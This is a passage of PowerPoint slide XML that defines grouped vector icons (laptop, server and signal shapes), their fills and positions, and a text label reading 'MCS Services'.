                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:srgbClr val="282828"/>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:srgbClr val="282828"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="1"/>
                    </a:gradFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>MCS Services</a:t>
                </a:r>
                <a:endPar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cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3883874" y="3753360"/>
              <a:ext cx="280652" cy="158859"/>
              <a:chOff x="4692650" y="4845050"/>
              <a:chExt cx="420687" cy="214312"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Rectangle 5"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4692650" y="4845050"/>
                <a:ext cx="420687" cy="214312"/>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6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4692650" y="4845050"/>
                <a:ext cx="420687" cy="107950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 265 w 265"/>
                  <a:gd name="T1" fmla="*/ 0 h 68"/>
                  <a:gd name="T2" fmla="*/ 133 w 265"/>
                  <a:gd name="T3" fmla="*/ 68 h 68"/>
                  <a:gd name="T4" fmla="*/ 0 w 265"/>
                  <a:gd name="T5" fmla="*/ 0 h 68"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="265" h="68">
                    <a:moveTo>
                      <a:pt x="265" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="133" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:ln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 name="Freeform 10"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5560201" y="3698152"/>
              <a:ext cx="354952" cy="269274"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 254 w 290"/>
                <a:gd name="T1" fmla="*/ 0 h 220"/>
                <a:gd name="T2" fmla="*/ 36 w 290"/>
                <a:gd name="T3" fmla="*/ 0 h 220"/>
                <a:gd name="T4" fmla="*/ 36 w 290"/>
                <a:gd name="T5" fmla="*/ 138 h 220"/>
                <a:gd name="T6" fmla="*/ 0 w 290"/>
                <a:gd name="T7" fmla="*/ 202 h 220"/>
                <a:gd name="T8" fmla="*/ 0 w 290"/>
                <a:gd name="T9" fmla="*/ 220 h 220"/>
                <a:gd name="T10" fmla="*/ 290 w 290"/>
                <a:gd name="T11" fmla="*/ 220 h 220"/>
                <a:gd name="T12" fmla="*/ 290 w 290"/>
                <a:gd name="T13" fmla="*/ 202 h 220"/>
                <a:gd name="T14" fmla="*/ 254 w 290"/>
                <a:gd name="T15" fmla="*/ 138 h 220"/>
                <a:gd name="T16" fmla="*/ 254 w 290"/>
                <a:gd name="T17" fmla="*/ 0 h 220"/>
                <a:gd name="T18" fmla="*/ 236 w 290"/>
                <a:gd name="T19" fmla="*/ 128 h 220"/>
                <a:gd name="T20" fmla="*/ 54 w 290"/>
                <a:gd name="T21" fmla="*/ 128 h 220"/>
                <a:gd name="T22" fmla="*/ 54 w 290"/>
                <a:gd name="T23" fmla="*/ 18 h 220"/>
                <a:gd name="T24" fmla="*/ 236 w 290"/>
                <a:gd name="T25" fmla="*/ 18 h 220"/>
                <a:gd name="T26" fmla="*/ 236 w 290"/>
                <a:gd name="T27" fmla="*/ 128 h 220"/>
                <a:gd name="T28" fmla="*/ 270 w 290"/>
                <a:gd name="T29" fmla="*/ 202 h 220"/>
                <a:gd name="T30" fmla="*/ 20 w 290"/>
                <a:gd name="T31" fmla="*/ 202 h 220"/>
                <a:gd name="T32" fmla="*/ 52 w 290"/>
                <a:gd name="T33" fmla="*/ 147 h 220"/>
                <a:gd name="T34" fmla="*/ 238 w 290"/>
                <a:gd name="T35" fmla="*/ 147 h 220"/>
                <a:gd name="T36" fmla="*/ 270 w 290"/>
                <a:gd name="T37" fmla="*/ 2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20">
                  <a:moveTo>
                    <a:pt x="254" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="236" y="128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54" y="128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="128"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="270" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="2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7" name="Freeform 10"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7244557" y="3698152"/>
              <a:ext cx="354952" cy="269274"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 254 w 290"/>
                <a:gd name="T1" fmla="*/ 0 h 220"/>
                <a:gd name="T2" fmla="*/ 36 w 290"/>
                <a:gd name="T3" fmla="*/ 0 h 220"/>
                <a:gd name="T4" fmla="*/ 36 w 290"/>
                <a:gd name="T5" fmla="*/ 138 h 220"/>
                <a:gd name="T6" fmla="*/ 0 w 290"/>
                <a:gd name="T7" fmla="*/ 202 h 220"/>
                <a:gd name="T8" fmla="*/ 0 w 290"/>
                <a:gd name="T9" fmla="*/ 220 h 220"/>
                <a:gd name="T10" fmla="*/ 290 w 290"/>
                <a:gd name="T11" fmla="*/ 220 h 220"/>
                <a:gd name="T12" fmla="*/ 290 w 290"/>
                <a:gd name="T13" fmla="*/ 202 h 220"/>
                <a:gd name="T14" fmla="*/ 254 w 290"/>
                <a:gd name="T15" fmla="*/ 138 h 220"/>
                <a:gd name="T16" fmla="*/ 254 w 290"/>
                <a:gd name="T17" fmla="*/ 0 h 220"/>
                <a:gd name="T18" fmla="*/ 236 w 290"/>
                <a:gd name="T19" fmla="*/ 128 h 220"/>
                <a:gd name="T20" fmla="*/ 54 w 290"/>
                <a:gd name="T21" fmla="*/ 128 h 220"/>
                <a:gd name="T22" fmla="*/ 54 w 290"/>
                <a:gd name="T23" fmla="*/ 18 h 220"/>
                <a:gd name="T24" fmla="*/ 236 w 290"/>
                <a:gd name="T25" fmla="*/ 18 h 220"/>
                <a:gd name="T26" fmla="*/ 236 w 290"/>
                <a:gd name="T27" fmla="*/ 128 h 220"/>
                <a:gd name="T28" fmla="*/ 270 w 290"/>
                <a:gd name="T29" fmla="*/ 202 h 220"/>
                <a:gd name="T30" fmla="*/ 20 w 290"/>
                <a:gd name="T31" fmla="*/ 202 h 220"/>
                <a:gd name="T32" fmla="*/ 52 w 290"/>
                <a:gd name="T33" fmla="*/ 147 h 220"/>
                <a:gd name="T34" fmla="*/ 238 w 290"/>
                <a:gd name="T35" fmla="*/ 147 h 220"/>
                <a:gd name="T36" fmla="*/ 270 w 290"/>
                <a:gd name="T37" fmla="*/ 2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20">
                  <a:moveTo>
                    <a:pt x="254" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="236" y="128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54" y="128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="128"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="270" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="2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9" name="Group 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8951396" y="4638293"/>
              <a:ext cx="304390" cy="270997"/>
              <a:chOff x="-508000" y="2447926"/>
              <a:chExt cx="376237" cy="334963"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Freeform 14"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-493713" y="2506663"/>
                <a:ext cx="231775" cy="146050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 64"/>
                  <a:gd name="T1" fmla="*/ 0 h 40"/>
                  <a:gd name="T2" fmla="*/ 0 w 64"/>
                  <a:gd name="T3" fmla="*/ 40 h 40"/>
                  <a:gd name="T4" fmla="*/ 64 w 64"/>
                  <a:gd name="T5" fmla="*/ 40 h 40"/>
                  <a:gd name="T6" fmla="*/ 64 w 64"/>
                  <a:gd name="T7" fmla="*/ 0 h 40"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 0 h 40"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="64" h="40">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="40"/>
                      <a:pt x="0" y="40"/>
                      <a:pt x="0" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="40"/>
                      <a:pt x="64" y="40"/>
                      <a:pt x="64" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="0"/>
                      <a:pt x="64" y="0"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>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15"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-508000" y="2709863"/>
                <a:ext cx="263525" cy="58738"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 166"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 141 w 166"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 166 w 166"/>
                  <a:gd name="T5" fmla="*/ 37 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 166"/>
                  <a:gd name="T7" fmla="*/ 37 h 37"/>
                  <a:gd name="T8" fmla="*/ 23 w 166"/>
                  <a:gd name="T9" fmla="*/ 0 h 37"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="166" h="37">
                    <a:moveTo>
                      <a:pt x="23" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="141" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23"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16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-290513" y="2447926"/>
                <a:ext cx="158750" cy="261938"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 100"/>
                  <a:gd name="T1" fmla="*/ 129 h 165"/>
                  <a:gd name="T2" fmla="*/ 0 w 100"/>
                  <a:gd name="T3" fmla="*/ 165 h 165"/>
                  <a:gd name="T4" fmla="*/ 100 w 100"/>
                  <a:gd name="T5" fmla="*/ 165 h 165"/>
                  <a:gd name="T6" fmla="*/ 100 w 100"/>
                  <a:gd name="T7" fmla="*/ 0 h 165"/>
                  <a:gd name="T8" fmla="*/ 0 w 100"/>
                  <a:gd name="T9" fmla="*/ 0 h 165"/>
                  <a:gd name="T10" fmla="*/ 0 w 100"/>
                  <a:gd name="T11" fmla="*/ 37 h 165"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="100" h="165">
                    <a:moveTo>
                      <a:pt x="0" y="129"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>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Line 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-261938" y="2622551"/>
                <a:ext cx="13017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Line 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="-261938" y="2535238"/>
                <a:ext cx="13017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Line 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="-176213" y="2478088"/>
                <a:ext cx="0" cy="2857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Line 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-377825" y="2652713"/>
                <a:ext cx="0" cy="571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1"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-176213" y="2768601"/>
                <a:ext cx="28575" cy="14288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 8"/>
                  <a:gd name="T1" fmla="*/ 4 h 4"/>
                  <a:gd name="T2" fmla="*/ 4 w 8"/>
                  <a:gd name="T3" fmla="*/ 0 h 4"/>
                  <a:gd name="T4" fmla="*/ 8 w 8"/>
                  <a:gd name="T5" fmla="*/ 4 h 4"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="8" h="4">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="4"/>
                      <a:pt x="8" y="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8" name="Freeform 10"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8926203" y="3698152"/>
              <a:ext cx="354952" cy="269274"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 254 w 290"/>
                <a:gd name="T1" fmla="*/ 0 h 220"/>
                <a:gd name="T2" fmla="*/ 36 w 290"/>
                <a:gd name="T3" fmla="*/ 0 h 220"/>
                <a:gd name="T4" fmla="*/ 36 w 290"/>
                <a:gd name="T5" fmla="*/ 138 h 220"/>
                <a:gd name="T6" fmla="*/ 0 w 290"/>
                <a:gd name="T7" fmla="*/ 202 h 220"/>
                <a:gd name="T8" fmla="*/ 0 w 290"/>
                <a:gd name="T9" fmla="*/ 220 h 220"/>
                <a:gd name="T10" fmla="*/ 290 w 290"/>
                <a:gd name="T11" fmla="*/ 220 h 220"/>
                <a:gd name="T12" fmla="*/ 290 w 290"/>
                <a:gd name="T13" fmla="*/ 202 h 220"/>
                <a:gd name="T14" fmla="*/ 254 w 290"/>
                <a:gd name="T15" fmla="*/ 138 h 220"/>
                <a:gd name="T16" fmla="*/ 254 w 290"/>
                <a:gd name="T17" fmla="*/ 0 h 220"/>
                <a:gd name="T18" fmla="*/ 236 w 290"/>
                <a:gd name="T19" fmla="*/ 128 h 220"/>
                <a:gd name="T20" fmla="*/ 54 w 290"/>
                <a:gd name="T21" fmla="*/ 128 h 220"/>
                <a:gd name="T22" fmla="*/ 54 w 290"/>
                <a:gd name="T23" fmla="*/ 18 h 220"/>
                <a:gd name="T24" fmla="*/ 236 w 290"/>
                <a:gd name="T25" fmla="*/ 18 h 220"/>
                <a:gd name="T26" fmla="*/ 236 w 290"/>
                <a:gd name="T27" fmla="*/ 128 h 220"/>
                <a:gd name="T28" fmla="*/ 270 w 290"/>
                <a:gd name="T29" fmla="*/ 202 h 220"/>
                <a:gd name="T30" fmla="*/ 20 w 290"/>
                <a:gd name="T31" fmla="*/ 202 h 220"/>
                <a:gd name="T32" fmla="*/ 52 w 290"/>
                <a:gd name="T33" fmla="*/ 147 h 220"/>
                <a:gd name="T34" fmla="*/ 238 w 290"/>
                <a:gd name="T35" fmla="*/ 147 h 220"/>
                <a:gd name="T36" fmla="*/ 270 w 290"/>
                <a:gd name="T37" fmla="*/ 2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20">
                  <a:moveTo>
                    <a:pt x="254" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="236" y="128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54" y="128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="128"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="270" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="2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4" name="Group 53"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9037665" y="3722534"/>
              <a:ext cx="133460" cy="109909"/>
              <a:chOff x="8928100" y="2995613"/>
              <a:chExt cx="242888" cy="200026"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8975725" y="3079751"/>
                <a:ext cx="147638" cy="55563"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 40"/>
                  <a:gd name="T1" fmla="*/ 9 h 15"/>
                  <a:gd name="T2" fmla="*/ 0 w 40"/>
                  <a:gd name="T3" fmla="*/ 9 h 15"/>
                  <a:gd name="T4" fmla="*/ 5 w 40"/>
                  <a:gd name="T5" fmla="*/ 15 h 15"/>
                  <a:gd name="T6" fmla="*/ 35 w 40"/>
                  <a:gd name="T7" fmla="*/ 15 h 15"/>
                  <a:gd name="T8" fmla="*/ 40 w 40"/>
                  <a:gd name="T9" fmla="*/ 9 h 15"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="40" h="15">
                    <a:moveTo>
                      <a:pt x="40" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="0" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="15"/>
                      <a:pt x="5" y="15"/>
                      <a:pt x="5" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="8"/>
                      <a:pt x="27" y="8"/>
                      <a:pt x="35" y="15"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="4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26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8928100" y="2995613"/>
                <a:ext cx="242888" cy="84138"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 66"/>
                  <a:gd name="T1" fmla="*/ 16 h 22"/>
                  <a:gd name="T2" fmla="*/ 0 w 66"/>
                  <a:gd name="T3" fmla="*/ 16 h 22"/>
                  <a:gd name="T4" fmla="*/ 5 w 66"/>
                  <a:gd name="T5" fmla="*/ 22 h 22"/>
                  <a:gd name="T6" fmla="*/ 61 w 66"/>
                  <a:gd name="T7" fmla="*/ 22 h 22"/>
                  <a:gd name="T8" fmla="*/ 66 w 66"/>
                  <a:gd name="T9" fmla="*/ 16 h 22"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="66" h="22">
                    <a:moveTo>
                      <a:pt x="66" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="0"/>
                      <a:pt x="18" y="0"/>
                      <a:pt x="0" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="22"/>
                      <a:pt x="5" y="22"/>
                      <a:pt x="5" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="9"/>
                      <a:pt x="46" y="9"/>
                      <a:pt x="61" y="22"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="6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27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9020175" y="3159126"/>
                <a:ext cx="58738" cy="36513"/>
